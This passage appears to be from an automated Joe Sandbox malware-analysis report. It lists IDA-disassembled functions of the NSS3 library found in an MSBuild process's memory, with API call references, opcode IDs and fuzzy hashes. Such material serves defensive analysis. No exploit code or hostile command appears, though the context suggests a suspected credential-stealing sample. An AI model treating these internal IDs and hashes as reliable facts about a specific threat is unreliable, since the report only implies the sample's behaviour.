                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                                                        • String ID:
                                                                                        • API String ID: 3941837925-0
                                                                                        • Opcode ID: b3a42378588d3d7ce929db1562aa663168b0baf1de71e66ab0a6b093d8d638fb
                                                                                        • Instruction ID: 9d191427ffec77d68878b72e74e206556b08efb866666db4b369efbd19389800
                                                                                        • Opcode Fuzzy Hash: b3a42378588d3d7ce929db1562aa663168b0baf1de71e66ab0a6b093d8d638fb
                                                                                        • Instruction Fuzzy Hash: F051E071A063119BEB00DE28CC88B6B7BE5EF84308F14083CEC5593750EB31E815CBAA
                                                                                        Function 6C69E400 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 113COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • TlsGetValue.KERNEL32(?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C69E432
                                                                                        • EnterCriticalSection.KERNEL32(?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C69E44F
                                                                                          • Part of subcall function 6C6A2C40: TlsGetValue.KERNEL32(#?jl,?,6C69E477,?,?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C6A2C62
                                                                                          • Part of subcall function 6C6A2C40: EnterCriticalSection.KERNEL32(0000001C,?,6C69E477,?,?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C6A2C76
                                                                                          • Part of subcall function 6C6A2C40: PL_HashTableLookup.NSS3(00000000,?,?,6C69E477,?,?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C6A2C86
                                                                                          • Part of subcall function 6C6A2C40: PR_Unlock.NSS3(00000000,?,?,?,?,6C69E477,?,?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C6A2C93
                                                                                        • TlsGetValue.KERNEL32(?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C69E494
                                                                                        • EnterCriticalSection.KERNEL32(?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C69E4AD
                                                                                        • PR_Unlock.NSS3(?,?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C69E4D6
                                                                                        • PR_Unlock.NSS3(?,?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C69E52F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalEnterSectionUnlockValue$HashLookupTable
                                                                                        • String ID: #?jl
                                                                                        • API String ID: 3106257965-1742918463
                                                                                        • Opcode ID: a1b496d22b80da148d2118c3d7eccd96356c2d4f2f99861a815c7229c2b191ae
                                                                                        • Instruction ID: 2e3f77267cd77d3698f8cdad911f512398be02cc54f8ca83c246e42d9d3b17e2
                                                                                        • Opcode Fuzzy Hash: a1b496d22b80da148d2118c3d7eccd96356c2d4f2f99861a815c7229c2b191ae
                                                                                        • Instruction Fuzzy Hash: 9C4119B5A04A06CFCB00EF78D58456ABBF0FF05304F054969D8859B711EB34E885CBEA
                                                                                        Function 6C698CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • TlsGetValue.KERNEL32(00000000,00000000,?,6C6A124D,00000001), ref: 6C698D19
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,6C6A124D,00000001), ref: 6C698D32
                                                                                        • PL_ArenaRelease.NSS3(?,?,?,?,?,6C6A124D,00000001), ref: 6C698D73
                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,6C6A124D,00000001), ref: 6C698D8C
                                                                                          • Part of subcall function 6C72DD70: TlsGetValue.KERNEL32 ref: 6C72DD8C
                                                                                          • Part of subcall function 6C72DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C72DDB4
                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,6C6A124D,00000001), ref: 6C698DBA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                        • String ID: KRAM$KRAM
                                                                                        • API String ID: 2419422920-169145855
                                                                                        • Opcode ID: b11148c615d70a37aa4c5ddc011eaf5c1320b2fca4698df8b11da88f4ebd8068
                                                                                        • Instruction ID: 00bda46c609be1fc33b0dafe994031e63c6ec255a796be76903055746fb15cb6
                                                                                        • Opcode Fuzzy Hash: b11148c615d70a37aa4c5ddc011eaf5c1320b2fca4698df8b11da88f4ebd8068
                                                                                        • Instruction Fuzzy Hash: 6521A1B1A046028FDB00EF38C58959AB7F0FF59318F15897AD89887721EB34E846CB95
                                                                                        Function 6C754D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C754DC3
                                                                                        • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C754DE0
                                                                                        Strings
                                                                                        • %s at line %d of [%.10s], xrefs: 6C754DDA
                                                                                        • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C754DCB
                                                                                        • API call with %s database connection pointer, xrefs: 6C754DBD
                                                                                        • misuse, xrefs: 6C754DD5
                                                                                        • invalid, xrefs: 6C754DB8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_log
                                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                        • API String ID: 632333372-2974027950
                                                                                        • Opcode ID: d09cff228c093946cb66d5e4164b99be3e2669d7b0fe9827b1f02dad02da6809
                                                                                        • Instruction ID: 2d7234256ea6d033786c5dcaf58da5db117a0d26562d965c3edfe2839475b54c
                                                                                        • Opcode Fuzzy Hash: d09cff228c093946cb66d5e4164b99be3e2669d7b0fe9827b1f02dad02da6809
                                                                                        • Instruction Fuzzy Hash: C4F02422A047282BD6004616CF12F9633594F02328F8619B0FF087BB52DE16A9709285
                                                                                        Function 6C754DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C754E30
                                                                                        • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C754E4D
                                                                                        Strings
                                                                                        • %s at line %d of [%.10s], xrefs: 6C754E47
                                                                                        • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C754E38
                                                                                        • API call with %s database connection pointer, xrefs: 6C754E2A
                                                                                        • misuse, xrefs: 6C754E42
                                                                                        • invalid, xrefs: 6C754E25
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_log
                                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                        • API String ID: 632333372-2974027950
                                                                                        • Opcode ID: 6b483051520233ab465218c77ba953df63ad886908b6e2cd0ae4c797d76925cb
                                                                                        • Instruction ID: c82198176f591c45ce1dd238b6aa55c99bbd2e7a91e8f52f5818d824e45d613a
                                                                                        • Opcode Fuzzy Hash: 6b483051520233ab465218c77ba953df63ad886908b6e2cd0ae4c797d76925cb
                                                                                        • Instruction Fuzzy Hash: D8F09711F448282BE60006228F14F83339D4B02329F8864F0FE0937F82CE169A7012D5
                                                                                        Function 6C6C0C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PR_SetError.NSS3(00000000,00000000,6C6C1444,?,00000001,?,00000000,00000000,?,?,6C6C1444,?,?,00000000,?,?), ref: 6C6C0CB3
                                                                                          • Part of subcall function 6C72C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C72C2BF
                                                                                        • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C6C1444,?,00000001,?,00000000,00000000,?,?,6C6C1444,?), ref: 6C6C0DC1
                                                                                        • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C6C1444,?,00000001,?,00000000,00000000,?,?,6C6C1444,?), ref: 6C6C0DEC
                                                                                          • Part of subcall function 6C6E0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C682AF5,?,?,?,?,?,6C680A1B,00000000), ref: 6C6E0F1A
                                                                                          • Part of subcall function 6C6E0F10: malloc.MOZGLUE(00000001), ref: 6C6E0F30
                                                                                          • Part of subcall function 6C6E0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C6E0F42
                                                                                        • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C6C1444,?,00000001,?,00000000,00000000,?), ref: 6C6C0DFF
                                                                                        • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C6C1444,?,00000001,?,00000000), ref: 6C6C0E16
                                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C6C1444,?,00000001,?,00000000,00000000,?), ref: 6C6C0E53
                                                                                        • PR_GetCurrentThread.NSS3(?,?,?,?,6C6C1444,?,00000001,?,00000000,00000000,?,?,6C6C1444,?,?,00000000), ref: 6C6C0E65
                                                                                        • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C6C1444,?,00000001,?,00000000,00000000,?), ref: 6C6C0E79
                                                                                          • Part of subcall function 6C6D1560: TlsGetValue.KERNEL32(00000000,?,6C6A0844,?), ref: 6C6D157A
                                                                                          • Part of subcall function 6C6D1560: EnterCriticalSection.KERNEL32(?,?,?,6C6A0844,?), ref: 6C6D158F
                                                                                          • Part of subcall function 6C6D1560: PR_Unlock.NSS3(?,?,?,?,6C6A0844,?), ref: 6C6D15B2
                                                                                          • Part of subcall function 6C69B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C6A1397,00000000,?,6C69CF93,5B5F5EC0,00000000,?,6C6A1397,?), ref: 6C69B1CB
                                                                                          • Part of subcall function 6C69B1A0: free.MOZGLUE(5B5F5EC0,?,6C69CF93,5B5F5EC0,00000000,?,6C6A1397,?), ref: 6C69B1D2
                                                                                          • Part of subcall function 6C6989E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C6988AE,-00000008), ref: 6C698A04
                                                                                          • Part of subcall function 6C6989E0: EnterCriticalSection.KERNEL32(?), ref: 6C698A15
                                                                                          • Part of subcall function 6C6989E0: memset.VCRUNTIME140(6C6988AE,00000000,00000132), ref: 6C698A27
                                                                                          • Part of subcall function 6C6989E0: PR_Unlock.NSS3(?), ref: 6C698A35
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 1601681851-0
                                                                                        • Opcode ID: 4773273922a4eaa360bab9967a78b129a5f64bee6ee2d65ab0596c8bb77bb487
                                                                                        • Instruction ID: bc69551b0ad29dfd861c6d5f3230345e5519d7f266b0563e955ff7867007c912
                                                                                        • Opcode Fuzzy Hash: 4773273922a4eaa360bab9967a78b129a5f64bee6ee2d65ab0596c8bb77bb487
                                                                                        • Instruction Fuzzy Hash: 8951A6F6E002056FEB009F64DC85AAB37A8EF49718F150064ED0997712FB31FD1986AB
                                                                                        Function 6C676E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • sqlite3_value_text.NSS3(?,?), ref: 6C676ED8
                                                                                        • sqlite3_value_text.NSS3(?,?), ref: 6C676EE5
                                                                                        • memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6C676FA8
                                                                                        • sqlite3_value_text.NSS3(00000000,?), ref: 6C676FDB
                                                                                        • sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6C676FF0
                                                                                        • sqlite3_value_blob.NSS3(?,?), ref: 6C677010
                                                                                        • sqlite3_value_blob.NSS3(?,?), ref: 6C67701D
                                                                                        • sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6C677052
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
                                                                                        • String ID:
                                                                                        • API String ID: 1920323672-0
                                                                                        • Opcode ID: d8109ea155a56e417c63a1b5d528d1493c4a247804379db3b581bc3866387e90
                                                                                        • Instruction ID: dfe8c88868e711f2a54ffc7de845a15f0f39834f2c75372cc1ba133c7ea9866b
                                                                                        • Opcode Fuzzy Hash: d8109ea155a56e417c63a1b5d528d1493c4a247804379db3b581bc3866387e90
                                                                                        • Instruction Fuzzy Hash: DE61E2B1E1420A8BDB21CF65C9047EEB7B2BF45308F284565D815AB750E736DC16CBB8
                                                                                        Function 6C6D2470 Relevance: 12.1, APIs: 8, Instructions: 141COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • TlsGetValue.KERNEL32(6C6D2D7C,6C6A9192,?), ref: 6C6D248E
                                                                                        • EnterCriticalSection.KERNEL32(02B80138), ref: 6C6D24A2
                                                                                        • memset.VCRUNTIME140(6C6D2D7C,00000020,6C6D2D5C), ref: 6C6D250E
                                                                                        • memset.VCRUNTIME140(6C6D2D9C,00000020,6C6D2D7C), ref: 6C6D2535
                                                                                        • memset.VCRUNTIME140(?,00000020,?), ref: 6C6D255C
                                                                                        • memset.VCRUNTIME140(?,00000020,?), ref: 6C6D2583
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6D2594
                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C6D25AF
                                                                                          • Part of subcall function 6C72C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C72C2BF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$Value$CriticalEnterErrorSectionUnlock
                                                                                        • String ID:
                                                                                        • API String ID: 2972906980-0
                                                                                        • Opcode ID: 1c6b31b422ce83bd54102749ffe3d768602727f1dcae1a28da1a33386fc87940
                                                                                        • Instruction ID: d1ca7ceaf5bd55138e78f063411d7828a081cdc1fb53c4cd6d572725b9a364ec
                                                                                        • Opcode Fuzzy Hash: 1c6b31b422ce83bd54102749ffe3d768602727f1dcae1a28da1a33386fc87940
                                                                                        • Instruction Fuzzy Hash: FC4100B1E102059BEB009F34DC9CBAA3774BB99309F160A68EC05D7A52F770FA94C295
                                                                                        Function 6C6D05A0 Relevance: 12.1, APIs: 8, Instructions: 127memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PORT_Alloc_Util.NSS3(00000000), ref: 6C6D05DA
                                                                                          • Part of subcall function 6C6E0BE0: malloc.MOZGLUE(6C6D8D2D,?,00000000,?), ref: 6C6E0BF8
                                                                                          • Part of subcall function 6C6E0BE0: TlsGetValue.KERNEL32(6C6D8D2D,?,00000000,?), ref: 6C6E0C15
                                                                                        • TlsGetValue.KERNEL32(00000000), ref: 6C6D060C
                                                                                        • EnterCriticalSection.KERNEL32 ref: 6C6D0629
                                                                                        • TlsGetValue.KERNEL32(00000000), ref: 6C6D066F
                                                                                        • EnterCriticalSection.KERNEL32 ref: 6C6D068C
                                                                                        • PR_Unlock.NSS3 ref: 6C6D06AA
                                                                                        • PK11_GetNextSafe.NSS3 ref: 6C6D06C3
                                                                                        • PR_Unlock.NSS3 ref: 6C6D06F9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value$CriticalEnterSectionUnlock$Alloc_K11_NextSafeUtilmalloc
                                                                                        • String ID:
                                                                                        • API String ID: 1593870348-0
                                                                                        • Opcode ID: 8aea2b4ff57291d3c9a03c2f6134240fd24b47c4f69bc739b0ecf9147b41f3ea
                                                                                        • Instruction ID: 589890e4938de5f266032dada7600b290d38505ebbad70f9cec357d51d180ac0
                                                                                        • Opcode Fuzzy Hash: 8aea2b4ff57291d3c9a03c2f6134240fd24b47c4f69bc739b0ecf9147b41f3ea
                                                                                        • Instruction Fuzzy Hash: 085138B4A057868FDB00EF79C48466ABBF4FF45308F118969D899DB701EB30E484CB95
                                                                                        Function 6C688620 Relevance: 10.6, APIs: 7, Instructions: 135memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SECITEM_CopyItem_Util.NSS3(00000000,00000000,6C687310,00000000,6C687310,?,?,00000004,?), ref: 6C688684
                                                                                          • Part of subcall function 6C6DFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C6D8D2D,?,00000000,?), ref: 6C6DFB85
                                                                                          • Part of subcall function 6C6DFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C6DFBB1
                                                                                        • SECITEM_CopyItem_Util.NSS3(00000000,-0000000C,6C687304,?,?,?,00000000,6C687310,?,?,00000004,?), ref: 6C68869F
                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,00000008,?,?,?,?,?,?,00000000,6C687310,?,?,00000004,?), ref: 6C6886D7
                                                                                        • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,00000000,6C687310,?,?,00000004,?), ref: 6C688706
                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,00000018,00000000,6C687310,00000004,00000000,?,6C688A20,00000004,00000000,6C687310,?,?,00000004,?), ref: 6C688656
                                                                                          • Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E10F3
                                                                                          • Part of subcall function 6C6E10C0: EnterCriticalSection.KERNEL32(?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E110C
                                                                                          • Part of subcall function 6C6E10C0: PL_ArenaAllocate.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1141
                                                                                          • Part of subcall function 6C6E10C0: PR_Unlock.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1182
                                                                                          • Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E119C
                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,00000008,00000000,6C687310,00000004,00000000,?,6C688A20,00000004,00000000,6C687310,?,?,00000004,?), ref: 6C688763
                                                                                        • PORT_ArenaGrow_Util.NSS3(00000000,6C688A20,?,?,00000000,6C687310,00000004,00000000,?,6C688A20,00000004,00000000,6C687310,?,?,00000004), ref: 6C688795
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Util$Arena$Alloc_$CopyGrow_Item_Value$AllocateCriticalEnterSectionUnlockmemcpy
                                                                                        • String ID:
                                                                                        • API String ID: 1239214001-0
                                                                                        • Opcode ID: edab0757da17ce9ed80277259f892125aa72fc68a5204f4ba0abaa766cbc824c
                                                                                        • Instruction ID: f8db2bc7f0eafa829eb9ccdc31d04fc62e407a59666513c62f24dd16c01e74b7
                                                                                        • Opcode Fuzzy Hash: edab0757da17ce9ed80277259f892125aa72fc68a5204f4ba0abaa766cbc824c
                                                                                        • Instruction Fuzzy Hash: EA41C171902210AFEB108F24CC00BAB37B9EF5A358F15426AEC159B761E771E945CBF9
                                                                                        Function 6C6CAC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
